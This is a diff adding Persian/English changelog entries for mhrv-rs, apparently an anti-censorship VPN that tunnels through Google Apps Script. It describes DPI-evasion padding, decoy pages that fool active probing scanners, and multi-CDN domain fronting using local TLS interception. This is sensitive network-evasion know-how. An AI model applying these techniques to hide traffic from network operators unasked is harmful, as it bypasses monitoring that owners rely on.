+• Defense active probing: decoy 404 nginx در tunnel-node روی auth بد: tunnel-node قبلاً `{"e":"unauthorized"}` JSON برمی‌گردوند. حالا response 404 با body HTML شبیه nginx default error می‌فرسته (active scanners "static web server هست، tunnel نیست" تشخیص می‌دن). env var `MHRV_DIAGNOSTIC=1` برای setup behavior قدیمی رو فعال می‌کنه
+• رفع باگ "Usage today (estimated) در Full mode همیشه ۰" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): counter `today_calls` و `today_bytes` فقط روی apps_script-mode relay path در `domain_fronter::relay()` افزایش می‌یافت. Full mode از `tunnel_client::fire_batch` می‌گذره که هیچ‌وقت کانتر رو افزایش نمی‌داد. حالا fire_batch بعد از batch موفق `record_today(response_bytes)` رو صدا می‌زنه — bytes از sum طول `d` و `pkts` در BatchTunnelResponse تخمین زده می‌شه. Full mode users حالا "Usage today" واقعی می‌بینن
+• رفع باگ "quota reset countdown با time UTC به‌جای PT نشون داده می‌شه" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230)، [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's UrlFetchApp quota در 00:00 **Pacific Time** ریست می‌شه (PST/PDT با DST)، نه UTC. ما UTC midnight رو نشون می‌دادیم — ۷-۸ ساعت off. fix: helpers جدید `current_pt_day_key()` + `seconds_until_pacific_midnight()` با hand-rolled DST detection (بدون اضافه کردن chrono-tz / 3MB tzdb). UI label "UTC day" → "PT day" تغییر کرد. ۲ test جدید برای DST window boundaries (مارس ۲۰۲۴/۲۰۲۶/۲۰۲۷، نوامبر ۲۰۲۴/۲۰۲۶) + Sakamoto's day-of-week
+---
+• Random payload padding for Apps Script requests ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313), [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): every outbound request to Apps Script now carries a `_pad` field of uniform-random length 0–1024 bytes (base64 encoded). Before this, request body sizes within each mode were tightly clustered, giving ISP DPI a clean length-distribution fingerprint to match against. Now packet sizes are spread uniformly across the range so length-clustering DPI heuristics can't match. Bandwidth cost: ~512 bytes added to a typical 2 KB tunnel batch = +25%, negligible against Apps Script's per-call latency floor. Backward-compatible: old Code.gs deployments ignore the unknown field. Applied at all three payload-build sites: single relay, single tunnel op, batch tunnel.
+• Active-probing defense: decoy 200 HTML on bad AUTH_KEY in `Code.gs` and `CodeFull.gs` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a request with a missing/wrong AUTH_KEY got `{"e":"unauthorized"}` as a JSON body — a clear "this is some kind of API endpoint" signal that active scanners can fingerprint. Now bad-auth requests get a benign HTML placeholder page that looks like a forgotten-but-public Apps Script web app, indistinguishable from the millions of stale Apps Script projects on Google's infrastructure. New `DIAGNOSTIC_MODE` const (default `false`) restores the old JSON error response for setup/debugging — flip to `true` while configuring a misconfigured client, then back to `false` before sharing the deployment widely.
+• Active-probing defense: decoy 404 nginx-style HTML on bad auth in `tunnel-node` ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): previously a bad-auth request got `{"e":"unauthorized"}`. Now it gets an HTTP 404 with an `nginx`-style error page body, looking like a vanilla static web server. Active scanners that POST malformed payloads to `/tunnel` to discover proxy endpoints categorize this host as "boring" and move on. New `MHRV_DIAGNOSTIC=1` env var restores the verbose JSON error during setup; default is the production decoy.
+• Fix "Usage today (estimated) is always 0 in Full mode" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): the daily-usage counters (`today_calls` / `today_bytes`) were incremented only on the `apps_script`-mode relay path inside `domain_fronter::relay()`. Full-mode traffic goes through `tunnel_client::fire_batch` which never wired the counter. Now `fire_batch` calls `record_today(response_bytes)` after each successful batch — bytes are estimated from the sum of per-session `d` (TCP payload) and `pkts` (UDP datagrams) lengths in the `BatchTunnelResponse`, which is a stable proxy for "how much did this batch move." Full mode users now see real usage numbers instead of stuck-at-zero.
+• Fix "quota reset countdown shown in UTC instead of Pacific Time" ([#230](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/230), [#362](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/362)): Apps Script's `UrlFetchApp` quota actually resets at midnight Pacific Time (PST/PDT — observes DST), not midnight UTC. We were displaying the countdown to UTC midnight, which is 7–8 hours off depending on DST. Fix: new `current_pt_day_key()` + `seconds_until_pacific_midnight()` helpers using a hand-rolled US DST detector (2nd Sunday of March → 1st Sunday of November = PDT, otherwise PST) so we don't pull `chrono-tz` and a ~3 MB IANA tzdb just for one helper. UI label updated from "UTC day" to "PT day". Two new tests pin down the DST window boundaries (March 2024 / 2026 / 2027, November 2024 / 2026) and Sakamoto's day-of-week formula.
diff --git a/docs/changelog/v1.8.1.md b/docs/changelog/v1.8.1.md
new file mode 100644
index 00000000..56bcadc2
--- /dev/null
+++ b/docs/changelog/v1.8.1.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• تشخیص خطای decoy v1.8.0 در سمت کلاینت — پیغام واضح به‌جای cryptic ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)، [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): قبلاً وقتی deployment auth fail می‌گرفت + decoy HTML برمی‌گردوند، client پیغام `WARN batch failed: bad response: no json in batch response: <!DOCTYPE html>...` می‌داد. کاربر باید خودش متن decoy رو می‌شناخت تا تشخیص بده. حالا client decoy رو با string-match تشخیص می‌ده + پیغام explicit می‌ده: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION, or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." — کاربر مستقیم می‌فهمه چی بکنه + ساعت‌ها debug ذخیره می‌شه
+• اضافه شدن `script_id` به همه log‌های batch-failure ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): قبلاً log `WARN batch failed: ...` نام deployment که fail کرد رو نشون نمی‌داد. در multi-deployment scenarios (5-10 deployment که برخی AUTH_KEY اشتباه داره)، کاربر نمی‌تونست بدون سختی deployment معیوب رو identify کنه. حالا همه پیغام‌های failure (timeout، bad response، decoy، missing-response-in-batch) شامل short prefix script_id هستند: `batch failed (script AKfycbz4): ...`. این در کنار تشخیص decoy بالا، اولین diagnostic قابل‌اعتماد برای سناریوی چند-deployment با یک AUTH_KEY اشتباه هست
+• Flag config جدید `disable_padding: true` ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): پیش‌فرض `false` (padding فعال = DPI defense). برای کاربران روی ISP‌های heavily-throttled که هزینه padding ~۲۵٪ bandwidth با throttle compounds + batchهای borderline-working رو into timeout می‌اندازه، گذاشتن `"disable_padding": true` در config.json در ازای محافظت length-distribution DPI، headroom برمی‌گردونه. توصیه نیست speculatively فعال بشه — فقط بعد از measurement throughput improvement.
+---
+• Client-side decoy detection — clear hint instead of cryptic error ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404), [#310](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310)): previously when a deployment had a stale/wrong AUTH_KEY, the deployment returned the v1.8.0 bad-auth decoy HTML, and the client logged `WARN batch failed: bad response: no json in batch response: <!DOCTYPE html>...` — leaving the user to recognize the decoy body string and infer the cause. Now the client string-matches the decoy and emits an explicit error: "got the v1.8.0 bad-auth decoy — your AUTH_KEY in mhrv-rs config does NOT match the AUTH_KEY in this deployment's Code.gs. Either fix the mismatch + redeploy as a NEW VERSION (Apps Script doesn't auto-pick-up AUTH_KEY edits without an explicit redeploy), or set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy to see the explicit JSON `unauthorized` error during setup." Saves users hours of staring at "no json in batch response" trying to figure out what's wrong.
+• Add `script_id` to every batch-failure log line ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): previously `WARN batch failed: ...` didn't identify which deployment failed. In multi-deployment setups (5-10 deployments where one or two have a stale AUTH_KEY), users couldn't identify the culprit without the per-deployment curl probe loop. Every failure log line now includes the short script_id prefix: `batch failed (script AKfycbz4): ...`, applied to all four failure paths (timeout, bad response, decoy, missing-response-in-batch). Together with the decoy detection above, the first reliable diagnostic for the multi-deployment-with-one-bad-AUTH_KEY user pattern.
+• New `disable_padding: true` config flag ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)): default `false` (padding active, full DPI defense). For users on heavily-throttled ISPs where the v1.8.0 random-padding cost (+~25% bandwidth per batch) compounds with the throttle to push borderline-working batches into timeouts, setting `"disable_padding": true` in `config.json` recovers headroom in exchange for losing length-distribution DPI defense. Don't flip on speculatively — for users where Apps Script outbound is uncongested, padding is free defense. Only enable if you've measured throughput improvement after the flip on your specific ISP path.
diff --git a/docs/changelog/v1.8.2.md b/docs/changelog/v1.8.2.md
new file mode 100644
index 00000000..9350c9c3
--- /dev/null
+++ b/docs/changelog/v1.8.2.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• اصلاح log level در UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): قبلاً `mhrv-rs-ui` (و Android) فیلتر tracing رو فقط از `RUST_LOG` env var یا default `info,hyper=warn` می‌خوند — مقدار `log_level` در `config.json` در عمل ignore می‌شد. فرم UI combobox `log_level` داشت ولی هیچ‌جا به subscriber اعمال نمی‌شد. حالا precedence اینه: `RUST_LOG` (اگر set باشد) > `config.log_level` > `info,hyper=warn`. علاوه بر این Save در UI الان log level رو live اعمال می‌کنه (بدون نیاز به restart) از طریق reload handle. CLI `mhrv-rs` از قبل درست کار می‌کرد — این فقط fix UI bin بود.
+• پیغام تشخیص decoy ملایم‌تر — به‌جای assert AUTH_KEY mismatch، چهار علت ممکن enumerate می‌کنه ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i گزارش داد همان `script_id` گاهی decoy و گاهی موفقیت برمی‌گرده در یک دقیقه — یعنی NOT AUTH_KEY mismatch (اگر بود ۱۰۰٪ fail می‌گرفت). تحقیق نشون داد body string `"The script completed but did not return anything"` اختصاصی به decoy v1.8.0 ما نیست — Apps Script همان body رو در ۴ سناریو برمی‌گردونه: (۱) AUTH_KEY mismatch (decoy ما، intentional)، (۲) Apps Script execution timeout یا quota tear، (۳) Google-side internal hiccup، (۴) ISP-side response truncation (#313 pattern). Error message v1.8.1 false positive داشت در سناریو ۲-۴. حالا پیغام: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch, (2) Apps Script execution timeout/quota tear, (3) Apps Script internal hiccup, (4) ISP-side response truncation. Set DIAGNOSTIC_MODE=true to disambiguate (1) — only AUTH_KEY mismatch returns this body in diagnostic mode." کاربر action درست رو کشف می‌کنه.
+---
+• Fix log level on the UI binary (Windows + Android) ([#401](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/401)): previously `mhrv-rs-ui` (and Android, which uses the same JNI path) installed its tracing filter from `RUST_LOG` only — falling back to `info,hyper=warn` when unset. The `log_level` field in `config.json` was effectively ignored, even though the UI form has a combobox that writes to it. The CLI binary (`mhrv-rs`) read `config.log_level` correctly via `init_logging()`; only the UI binary was broken. New precedence: `RUST_LOG` (explicit override) > `config.log_level` (what the user picked in the form) > `info,hyper=warn` (default). The Save button now also reinstalls the filter live via a `tracing_subscriber::reload::Handle`, so users don't need to restart for a level change to take effect. RUST_LOG still wins if set at boot — explicit override beats config in both directions.
+• Soften the v1.8.1 decoy detection error message — enumerate four candidate causes instead of asserting AUTH_KEY mismatch ([#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)): @w0l4i reported the same `script_id` mixing decoy ERROR with successful batches inside a one-minute window — which rules out AUTH_KEY mismatch as the cause (a real mismatch fails 100% of batches against that deployment, never succeeds intermittently). Investigation showed the body string `"The script completed but did not return anything"` is **not** unique to our v1.8.0 bad-auth path — Apps Script itself returns the same body in three other unrelated cases: (2) Apps Script execution timeout or per-100s quota tear, (3) Google-side internal runtime hiccup, (4) ISP-side response truncation mid-flight (the #313 pattern). The v1.8.1 error message was a false positive in scenarios 2-4. The v1.8.2 message now reads: "got the v1.8.0 decoy/placeholder body — could be (1) AUTH_KEY mismatch (run a direct curl probe against the deployment to verify), (2) Apps Script execution timeout or per-100s quota tear (try lowering parallel_concurrency), (3) Apps Script internal hiccup (transient, retry next batch), or (4) ISP-side response truncation (#313 pattern, try a different google_ip). To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new version — only AUTH_KEY mismatch returns this body in diagnostic mode." Users now have an actionable narrowing procedure instead of a confidently-wrong assertion.
diff --git a/docs/changelog/v1.8.3.md b/docs/changelog/v1.8.3.md
new file mode 100644
index 00000000..f408ce94
--- /dev/null
+++ b/docs/changelog/v1.8.3.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• cache spreadsheet اختیاری در Code.gs برای کاهش مصرف quota ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400)، PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) از @euvel): GET requests عمومی که Cache-Control header دارن می‌تونن از Google Sheet به‌جای Apps Script's UrlFetchApp serve بشن. هزینه‌ی هر cache hit ~۵-۲۰ms (Sheet read) به‌جای ۲۵۰-۵۰۰ms (UrlFetchApp roundtrip). features کامل: TTL-aware (max-age, no-cache, no-store, private respect)، header rewriting (Date/Age/X-Cache)، circular buffer برای O(1) writes، Vary-aware با Accept-Encoding/Accept-Language. opt-in via یک constant `CACHE_SPREADSHEET_ID` در Code.gs — default غیرفعال، بدون overhead برای کاربران که نمی‌خوان. setup: ساخت یک Google Sheet جدید + قرار دادن ID آن در `CACHE_SPREADSHEET_ID` + redeploy as new version
+• bypass DoH endpoints from Apps Script tunnel ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377)، PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) از @dazzling-no-more): قبلاً در Full mode هر DNS-over-HTTPS lookup browser از طریق Apps Script tunnel می‌رفت — `chrome.cloudflare-dns.com:443`، `dns.google:443` و سایر هزینه ~۲ ثانیه UrlFetchApp roundtrip به ازای هر name داشتن. ولی DoH از قبل encrypted هست + tunnel privacy اضافه‌ای نمی‌ده — فقط fact-of-DoH رو از local network مخفی می‌کنه که ناچیزه. حالا DoH bypass (به‌صورت پیش‌فرض فعال) lookupهای DoH رو مستقیم via TCP/443 route می‌کنه. لیست کامل bypass شامل: Cloudflare (incl. chrome./mozilla./1dot1dot1dot1.)، Google، Quad9، AdGuard، NextDNS، OpenDNS، CleanBrowsing، dns.sb، dns0.eu، AliDNS، doh.pub، Mullvad. کاربران می‌توانند با `tunnel_doh: true` در config opt-out کنن یا با `bypass_doh_hosts: ["custom1.com", "custom2.com"]` لیست رو extend کنن
+• H1 container keepalive (~۲۴۰s) برای جلوگیری از Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): Apps Script container‌ها بعد از ~۵ دقیقه idle cold می‌شن + ۱-۳ ثانیه به wake-up زمان می‌برن. این به‌خصوص در YouTube playback بعد از pause طولانی stall به‌وضوح دیده می‌شد. با ping HEAD به example.com هر ۲۴۰ ثانیه از طریق relay، container warm نگه داشته می‌شه. cache + inflight coalescer bypass شده تا ping واقعاً به Apps Script برسه. در google_only mode غیرفعال
+• 431 Request Header Fields Too Large به‌جای drop سکوتی (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) از @dazzling-no-more): قبلاً اگر header block > ۱ MB می‌شد، socket drop می‌شد + browser silently retry می‌کرد + loop ابدی. حالا cap به ۶۴ KB کاهش یافته (match upstream Python) + explicit `HTTP/1.1 431 Request Header Fields Too Large` response برمی‌گرده + close می‌شه. browser ارور رو می‌بینه + دیگه loop نمی‌کنه
+• پیام error config port-collision واضح‌تر شد (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): قبلاً پیام cryptic بود. حالا: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` — کاربر مستقیم می‌فهمه چی fix بکنه
+---
+• Optional spreadsheet-backed response cache in `Code.gs` to reduce UrlFetchApp quota consumption ([#400](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/400), PR [#443](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/443) by @euvel): public GET requests with `Cache-Control` headers can now be served from a Google Sheet instead of round-tripping through `UrlFetchApp`. Cache hit costs ~5-20ms (Sheet read) vs ~250-500ms (UrlFetchApp). Features: TTL-aware caching (respects `max-age`, `no-cache`, `no-store`, `private`), 35 KB body-size gate (under the Sheets cell limit), header rewriting (Date/Age/Cache-Control/X-Cache/X-Cached-At), circular buffer for O(1) writes, Vary-aware compound keys (Accept-Encoding + Accept-Language). Opt-in via a single `CACHE_SPREADSHEET_ID` constant — default off, zero overhead for users who don't want it. Setup: create a new Google Sheet, paste its ID into `CACHE_SPREADSHEET_ID`, redeploy as new version. Run `getCacheStats()` from the Apps Script editor to see hit/miss/eviction counts.
+• Bypass Apps Script tunnel for DoH endpoints on TCP/443 ([#377](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/377), PR [#439](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/439) by @dazzling-no-more): previously every browser DNS-over-HTTPS lookup in Full mode rode through the Apps Script tunnel — `chrome.cloudflare-dns.com:443`, `dns.google:443`, etc. each paid the ~2-second UrlFetchApp round-trip per name. But DoH is already encrypted at the transport layer; tunneling it adds no real privacy (only hiding fact-of-DoH from the local network, which is marginal). Now the DoH bypass (on by default) routes known DoH hosts around the tunnel via plain TCP. Built-in list: Cloudflare (incl. `chrome.`/`mozilla.`/`1dot1dot1dot1.` browser-pinned variants), Google, Quad9, AdGuard, NextDNS, OpenDNS, CleanBrowsing, dns.sb, dns0.eu, AliDNS, doh.pub, Mullvad. Users can opt out with `tunnel_doh: true` or extend the list with `bypass_doh_hosts: ["custom1.com", "custom2.com"]`. Gated to TCP/443 only — private DoH endpoints on `:8443` should use `passthrough_hosts` instead. ProxyServer warns at startup if `tunnel_doh: true` is paired with non-empty `bypass_doh_hosts` (the otherwise-silent inert combo). 6 unit tests for `matches_doh_host` covering exact match, case insensitivity, trailing dots, suffix tenant subdomains, user extras extending the default list, and the asymmetric-matching footgun guard.
+• H1 container keepalive (~240s) to prevent Apps Script V8 cold-start stalls (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): Apps Script V8 containers go cold after ~5 minutes idle and cost 1-3s to wake. Most visible as YouTube player stalls after a quiet pause. Now sends a `HEAD http://example.com/` ping every 240s through the relay to keep the container warm. Bypasses the response cache and inflight coalescer (otherwise the second iteration would just hit the cache and never reach Apps Script). Skipped in `google_only` mode. The `JoinHandle` is captured so shutdown's `select!` arm can abort it cleanly — without that, hitting Stop in the UI would leave the keepalive holding an `Arc<DomainFronter>` on stale config (same class of bug as #99 hit for accept loops).
+• 431 Request Header Fields Too Large instead of silent drop (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438) by @dazzling-no-more): previously header blocks larger than 1 MB were silently dropped at the socket level, causing browsers to retry on connection-reset and loop indefinitely on the same oversized request. Now the cap is tightened to 64 KB (matching upstream Python's `MAX_HEADER_BYTES`) and oversized requests get an explicit `HTTP/1.1 431 Request Header Fields Too Large` reply followed by close. Both the plaintext HTTP frontend and the MITM HTTPS relay path now do this. Browsers see the error and don't loop.
+• Clearer port-collision error message (PR [#438](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/438)): the same-port validation already existed; only the message was vague. Now reads: `"both set to 8080 on 127.0.0.1. Change one of them in config.json."` matching upstream Python's clarity.
diff --git a/docs/changelog/v1.8.4.md b/docs/changelog/v1.8.4.md
new file mode 100644
index 00000000..11e479a1
--- /dev/null
+++ b/docs/changelog/v1.8.4.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **adaptive batch coalescing** برای کاهش تعداد Apps Script roundtrip‌ها (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) از @yyoyoian-pixel): قبلاً هر op فقط ۸ms برای op‌های هم‌زمان دیگر صبر می‌کرد + اکثراً batchها فقط ۱ op داشتن. حالا scheme adaptive: اولین op یک timer ۴۰ms استارت می‌زنه، op‌های جدید reset می‌کنن، اگر ۴۰ms idle شد batch fire می‌شه. cap نهایی ۱۰۰۰ms. نتیجه field test روی شبکه ایران: ops/batch از ۱.۰ به ۲-۳، P75 RTT از ۶.۲s به ۳.۰s، کاهش ~۵۰٪ Apps Script call. configurable از طریق `coalesce_step_ms` / `coalesce_max_ms` در config + در Android UI Advanced section با slider
+• **tunnel-node long-poll از ۵s به ۱۵s** برای پایداری Telegram + Google Push (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) از @yyoyoian-pixel): قبلاً connection‌های persistent (Telegram XMPP پورت ۵۲۲۲، Google Push پورت ۵۲۲۸) هر ۵ ثانیه empty-response برمی‌گرفتن + apps این رو instability تفسیر می‌کردن + session reconnect می‌زدن. هر reconnect معادل یک TLS handshake کامل (~۴s از طریق Apps Script) یعنی buffering قابل مشاهده در تماس Telegram یا playback. حالا long-poll تا ۱۵ ثانیه باز می‌مونه + persistent connection پایدار می‌مونه
+• **adaptive straggler settle** در tunnel-node (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): قبلاً fixed ۳۰ms wait بعد از اولین session که data داشت. حالا adaptive ۴۰ms-step تا ۵۰۰ms-max که زود break می‌شه اگر همه session‌ها ready باشن. در شبکه‌های latency بالا (~۱.۵s Apps Script overhead) packing بیشتر session response در یک batch، quota مصرف کم‌تری ایجاد می‌کنه
+---
+• **Adaptive batch coalescing** to reduce Apps Script round-trip count (PR [#448](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/448) by @yyoyoian-pixel): the previous fixed 8ms coalesce window barely caught concurrent ops — most batches were a single op. The new adaptive scheme starts a 40ms timer on first arrival, resets on each new op, fires the batch when the window stays empty, with a hard 1000ms cap. Field testing on a network in Iran showed ops/batch went from ~1.0 to 2-3, P75 RTT 6.2s → 3.0s, fast (<3s) batches 61% → 74-85%, total Apps Script calls roughly halved. Both values configurable via `coalesce_step_ms` / `coalesce_max_ms` in `config.json` and via sliders in the Android UI's Advanced section. Desktop UI sliders are queued for the v1.8.x desktop UI batch alongside the system-proxy toggle (#432).
+• **tunnel-node long-poll raised from 5s to 15s** for persistent-connection stability (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446) by @yyoyoian-pixel): at 5s long-poll, persistent connections like Telegram XMPP (`:5222`) and Google Push (`mtalk.google.com:5228`) interpreted the frequent empty-poll returns as connection instability and rotated sessions. Each reconnect cost a full TLS handshake (~4s through Apps Script), causing visible interruptions during Telegram video/voice calls and media playback. The 15s long-poll holds the response open until server data actually arrives, keeping persistent sessions alive without unnecessary re-handshakes.
+• **Adaptive straggler settle in tunnel-node** (PR [#446](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/446)): the previous fixed 30ms straggler settle was too short to catch neighboring sessions with data. Replaced with adaptive 40ms-step / 500ms-max settle that breaks early when all sessions in a batch have data. On high-latency relays (~1.5s Apps Script overhead per call), packing more session responses into one batch saves quota; the early-break prevents wasted time when all data is already ready.
diff --git a/docs/changelog/v1.8.5.md b/docs/changelog/v1.8.5.md
new file mode 100644
index 00000000..eead68c8
--- /dev/null
+++ b/docs/changelog/v1.8.5.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• fix tunnel-node: cap هر TCP drain روی ۱۶ MiB تا batch response از سقف Apps Script (~۵۰ MiB) عبور نکنه ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) از @bankbunk): روی VPS های پر-bandwidth (۱ Gbps) reader task می‌تونه هزاران مگابایت رو در buffer per-session جمع کنه قبل از اینکه poll بعدی بیاد. قبلاً `drain_now` همه‌ی buffer رو در یک batch response می‌گرفت، base64 encoding (~۱.۳۳×) + JSON envelope اضافه می‌کرد، نتیجه از سقف ۵۰ MiB Apps Script رد می‌شد. Apps Script body رو wrap-around mid-base64 کوتاه می‌کرد + client side `serde_json` parse error با `EOF while parsing a string at line 1 column 52428685` می‌گرفت. برای استریم MP4 یا هر بایت‌سنگین upstream این bug stream رو مرتب کرش می‌داد. حالا `drain_now` حداکثر ۱۶ MiB در هر poll برمی‌گردونه + tail رو در buffer برای poll بعدی نگه می‌داره. eof تا finalize شدن buffer reported نمی‌شه که session بی‌موقع tear نشه. workaround قبلی @bankbunk (محدودکردن interface VPS با `wondershaper` به ۴۰ Mbps) دیگر لازم نیست — fix server-side پیاده شد و کاربران throughput عادی VPS رو خواهند داشت
+---
+• Fix tunnel-node: cap each TCP drain at 16 MiB so batch responses stay under Apps Script's ~50 MiB body ceiling ([#460](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/460) by @bankbunk): on high-bandwidth VPS (1 Gbps+), the reader task can stuff the per-session read buffer with tens of MiB between client polls. The old `drain_now` took the entire buffer in one shot, base64-encoded it (1.33× overhead), wrapped it in JSON, and the resulting body exceeded Apps Script's hard ~50 MiB Web App response limit. Apps Script truncated the body mid-base64; the client failed `serde_json` parse with `EOF while parsing a string at line 1 column 52428685` (= 50 MiB) and the stream tore. Most visibly, raw MP4 streams crashed minutes into playback. The fix splits oversized buffers: at most `TCP_DRAIN_MAX_BYTES` (16 MiB) is returned per drain, and the remainder stays in the buffer for the next poll. EOF is held back until the buffer is fully drained so partial drains don't prematurely close the session. Three regression tests cover the cap, the under-cap pass-through, and the EOF-holdback case (33 tunnel-node tests passing). @bankbunk's `wondershaper` workaround (rate-limiting the VPS interface to 40 Mbps) is no longer necessary — high-bandwidth VPS users can let throughput run at line rate again.
diff --git a/docs/changelog/v1.9.0.md b/docs/changelog/v1.9.0.md
new file mode 100644
index 00000000..2017b788
--- /dev/null
+++ b/docs/changelog/v1.9.0.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **شکستگی سازگاری minor: نام‌گذاری `mode = "google_only"` به `mode = "direct"` تغییر کرد** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more): نام قدیمی توصیف وضعیت رو بعد از اضافه شدن fronting_groups (که فراتر از Google می‌رسه) درست نمی‌داد. در Rust + Android + UI dropdown همه به `direct` تغییر کرده‌اند، ولی **`google_only` به‌عنوان alias deprecated در parser قابل قبول مونده** — config‌ها و saved settings قدیمی نمی‌شکنن. در Save بعدی، on-disk file خودکار به `direct` migrate می‌شه. در docs (README EN/FA, SF_README EN/FA, tunnel-node FA) note "تا قبل v1.9 نام `google_only` بود — هنوز کار می‌کنه" گذاشته شده برای کاربرانی که از راهنماهای قدیمی یا پست‌های Telegram قدیمی استفاده می‌کنن.
+• fronting_groups: domain fronting چند-edge برای CDN غیر-Google (Vercel، Fastly، …) (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more، با credit به [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) برای technique اصلی): فیلد جدید config `fronting_groups: [{name, ip, sni, domains}]`. هر group شامل (edge IP، front SNI، domain‌های member). وقتی CONNECT به یکی از domain‌های member می‌رسه، proxy MITM می‌کنه + upstream با `ip` به‌عنوان TCP destination + `sni` به‌عنوان TLS SNI re-encrypt می‌کنه — همان trick که برای `google_ip` + `front_domain` می‌کنیم، حالا قابل تنظیم برای هر CDN multi-tenant. بر روی Google fronting (built-in) برتری داره؛ زیر `passthrough_hosts` و DoH bypass قرار داره. در `mode = full` غیر فعال (که end-to-end TLS رو حفظ می‌کنه + MITM نمی‌کنه). config مثال: `config.fronting-groups.example.json`. doc کامل: `docs/fronting-groups.md` شامل recipe انتخاب `(ip, sni)`، routing precedence، و warning صریح ⚠️ درباره cross-tenant Host-header leak failure mode (هرگز domain‌هایی که واقعاً روی edge نیستند رو list نکنید). reviews folded: SNI با rustls در config-load gate اعتبارسنجی می‌شه، `Vec<Arc<>>` به‌جای clone-on-match، byte-level dot-anchored matcher، startup warnings برای inert combos.
